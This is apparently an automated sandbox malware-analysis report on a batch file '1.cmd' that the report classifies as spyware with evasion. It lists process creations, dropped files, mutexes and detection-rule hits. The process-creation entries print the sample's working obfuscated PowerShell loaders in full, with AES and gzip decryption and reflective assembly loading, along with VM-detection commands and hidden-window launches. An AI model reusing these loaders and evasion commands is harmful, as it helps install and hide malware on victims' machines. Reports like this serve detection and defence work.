Source: powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9B8C0FF4 NtResumeThread,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9B8C0F30 NtSetContextThread,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9B8C0C6D NtWriteVirtualMemory,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9B8BE0B8 NtUnmapViewOfSection,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9B8C0A4E NtUnmapViewOfSection,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 36_2_00007FFD9B8BE088 NtUnmapViewOfSection,
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,
Source: C:\Windows\System32\winlogon.exe Code function: 39_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,
Source: C:\Windows\System32\lsass.exe Code function: 40_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,
Source: C:\Windows\System32\dwm.exe Code function: 42_2_000002BAAEE42C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 45_2_0000016CE6532300 NtQuerySystemInformation,StrCmpNIW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\20241004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\system32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: unknown Process created: Commandline size = 5344
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2674
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2682
Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr Binary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr Binary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}d
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr Binary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr Binary string: \Device\NetbiosSmb
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr Binary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.50.dr Binary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr Binary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.50.dr Binary string: C:\Device\HarddiskVolume3`
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr Binary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.50.dr Binary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeH**
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr Binary string: A\Device\HarddiskVolume3\Program Files\Mozilla Firefox\firefox.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.50.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.50.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.50.dr Binary string: K\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.50.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}l
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.50.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.50.dr Binary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engine Classification label: mal100.spyw.evad.winCMD@55/94@1/1
Source: C:\Windows\System32\dllhost.exe Code function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 35_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20241004
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\2820930
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3732:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\4817770
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2756:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4828
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\6260321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_squa0cl3.qra.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1.cmd Virustotal: Detection: 14%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''
+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
